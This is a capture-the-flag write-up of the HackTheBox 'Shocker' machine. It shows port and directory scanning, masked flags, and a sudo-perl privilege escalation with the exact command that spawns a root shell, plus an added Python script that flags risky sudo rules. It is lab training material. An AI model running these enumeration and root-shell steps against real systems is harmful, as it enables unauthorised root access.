Shocker Write-up — HackTheBox

Initial Enumeration:

nmap -sC -vv -sV -Pn -O -A -oN nmap_scan.txt $IP
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc=
| 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk

Visiting the website:

Main Enumeration:

##dirb:
---- Scanning URL: http://shocker.htb/ ----
+ http://shocker.htb/cgi-bin/ (CODE:403|SIZE:294)
+ http://shocker.htb/index.html (CODE:200|SIZE:14)
+ http://shocker.htb/server-status (CODE:403|SIZE:299)
##dirsearch:
[05:14:56] Starting:
[05:15:04] 403 - 300B - /.htaccess.bak1
[05:15:04] 403 - 300B - /.htaccess.orig
[05:15:04] 403 - 302B - /.htaccess.sample
[05:15:04] 403 - 300B - /.htaccess.save
[05:15:04] 403 - 298B - /.htaccessBAK
[05:15:04] 403 - 298B - /.htaccessOLD
[05:15:04] 403 - 299B - /.htaccessOLD2
[05:15:04] 403 - 291B - /.html
[05:15:04] 403 - 290B - /.htm
[05:15:04] 403 - 297B - /.httr-oauth
[05:15:42] 403 - 294B - /cgi-bin/
[05:15:56] 200 - 137B - /index.html
[05:16:16] 403 - 299B - /server-status
[05:16:16] 403 - 300B - /server-status/
##gobuster 2nd run:
root@kali:/home/czar/Downloads# gobuster dir -u http://shocker.htb/cgi-bin/ -t 80 -w /home/czar/Downloads/HTB/tools/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.txt,.sh
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://shocker.htb/cgi-bin/
[+] Threads: 80
[+] Wordlist: /home/czar/Downloads/HTB/tools/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,sh
[+] Timeout: 10s
===============================================================
2020/11/28 08:23:39 Starting gobuster
===============================================================
/user.sh (Status: 200)
Progress: 2076 / 220561 (0.94%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/11/28 08:23:58 Finished
===============================================================

Metasploit:

Getting User

shelly@Shocker:/home/shelly$ cat user.txt
cat user.txt
44d**************************bb4
shelly@Shocker:/home/shelly$

Privilege Escalation

shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/home/shelly$ sudo perl -e 'exec "/bin/sh";'
# whoami && id
whoami && id
root
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
cat /root/root.txt
4fb5************************ad55
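The `sudo -l` output above is the whole privilege-escalation finding: a NOPASSWD rule on an interpreter is a root shell. As an added example (not code from the original write-up), here is a small audit that parses `sudo -l` output in that format and flags such rules; the INTERPRETERS set and the harmless apt-get rule in the sample are constructed assumptions.

```python
import re
from os.path import basename

# Binaries that will exec an arbitrary program for the caller (assumed list).
INTERPRETERS = {"perl", "python", "python2", "python3", "ruby", "bash", "sh",
                "dash", "zsh", "env", "awk", "find", "vim", "less", "man"}

# One sudoers rule as printed by `sudo -l`: "(runas) TAG: TAG: /path/cmd args, /path/other"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")

# `sudo -l` output from the box, plus one constructed harmless rule for contrast.
SAMPLE_SUDO_L = """\
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/apt-get update
"""


def audit_sudo_l(text: str) -> list[tuple[str, str, str]]:
    """Return (runas, command, reason) for each rule that amounts to a root shell."""
    findings = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True  # every indented line after this header is a rule
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        runas = m.group("runas").strip()
        # "(root : root)" -> users before the colon; "(root, www-data)" -> several users
        runas_users = {u.strip() for u in runas.split(":")[0].split(",")}
        as_root = bool(runas_users & {"root", "ALL"})
        tags = set(re.findall(r"[A-Z]+", m.group("tags")))
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if not cmd:
                continue
            if cmd == "ALL":
                findings.append((runas, cmd, "ALL commands"))
            elif as_root and basename(cmd.split()[0]) in INTERPRETERS:
                how = "without a password" if "NOPASSWD" in tags else "with the user's password"
                findings.append((runas, cmd, f"interpreter can exec a root shell {how}"))
    return findings


if __name__ == "__main__":
    for runas, cmd, reason in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"RISK ({runas}) {cmd}: {reason}")
```

Run it against the real output of `sudo -l` on a host to list every rule that should be reviewed; a clean result is an empty list.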

Manual Exploitation:

--

--
